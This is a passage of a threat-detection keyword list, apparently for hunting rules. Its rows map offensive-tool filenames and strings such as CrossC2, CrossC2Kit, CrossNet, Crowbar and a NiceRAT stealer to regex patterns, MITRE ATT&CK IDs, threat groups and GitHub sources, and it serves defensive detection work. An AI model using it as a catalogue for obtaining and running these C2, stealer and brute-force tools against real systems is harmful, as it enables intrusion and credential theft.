T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2.cna*",".{0,1000}CrossC2\.cna.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2.git*",".{0,1000}CrossC2\.git.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2.Linux*",".{0,1000}CrossC2\.Linux.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2.MacOS*",".{0,1000}CrossC2\.MacOS.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2.Win*",".{0,1000}CrossC2\.Win.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2_dev_*",".{0,1000}CrossC2_dev_.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*crossc2_entry*",".{0,1000}crossc2_entry.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*crossc2_portscan.*",".{0,1000}crossc2_portscan\..{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*crossc2_serverscan.*",".{0,1000}crossc2_serverscan\..{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*CrossC2Beacon*",".{0,1000}CrossC2Beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2-cs*",".{0,1000}CrossC2\-cs.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2-GithubBot*",".{0,1000}CrossC2\-GithubBot.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2Kit",".{0,1000}CrossC2Kit","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2Kit.*",".{0,1000}CrossC2Kit\..{0,1000}","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*CrossC2Kit.*",".{0,1000}CrossC2Kit\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*CrossC2Kit.git*",".{0,1000}CrossC2Kit\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*CrossC2Kit_demo*",".{0,1000}CrossC2Kit_demo.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*crossc2kit_latest*",".{0,1000}crossc2kit_latest.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2Kit_Loader*",".{0,1000}CrossC2Kit_Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*CrossC2Listener*",".{0,1000}CrossC2Listener.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossC2MemScriptEng*",".{0,1000}CrossC2MemScriptEng.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*CrossC2Script*",".{0,1000}CrossC2Script.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*CrossLinked*",".{0,1000}CrossLinked.{0,1000}","offensive_tool_keyword","CrossLinked","CrossLinked simplifies the processes of searching LinkedIn to collect valid employee names when performing password spraying or other security testing against an organization. Using similar search engine scraping capabilities found in tools like subscraper and pymeta","T1596 - T1593 - T1591 - T1589 - T1556 - T1213","TA0043 - TA0010 - TA0009","N/A","N/A","Information Gathering","https://github.com/m8r0wn/CrossLinked","1","0","N/A","N/A","10","1149","173","2024-04-17T18:32:59Z","2019-05-16T13:36:36Z" "*CrossNet.exe*",".{0,1000}CrossNet\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","360","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*Cross-Site-Scripting-XSS-Payloads*",".{0,1000}Cross\-Site\-Scripting\-XSS\-Payloads.{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*CrossTenantSynchronizationBackdoor.ps1*",".{0,1000}CrossTenantSynchronizationBackdoor\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*crowbar*",".{0,1000}crowbar.{0,1000}","offensive_tool_keyword","Crowbar","Crowbar (formally known as Levye) is a brute forcing tool that can be used during penetration tests. It was developed to brute force some protocols in a different manner according to other popular brute forcing tools. As an example. while most brute forcing tools use username and password for SSH brute force. Crowbar uses SSH key(s). This allows for any private keys that have been obtained during penetration tests. to be used to attack other SSH servers.","T1110 - T1114 - T1189 - T1051 - T1552","TA0002 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/galkan/crowbar","1","0","N/A","N/A","10","1306","318","2023-12-19T20:57:36Z","2014-09-30T07:46:23Z" "*CroweCybersecurity/ad-ldap-enum*",".{0,1000}CroweCybersecurity\/ad\-ldap\-enum.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","AD Enumeration","6","4","301","67","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" "*crpasswords.txt*",".{0,1000}crpasswords\.txt.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*CRTInjectAsSystem*",".{0,1000}CRTInjectAsSystem.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 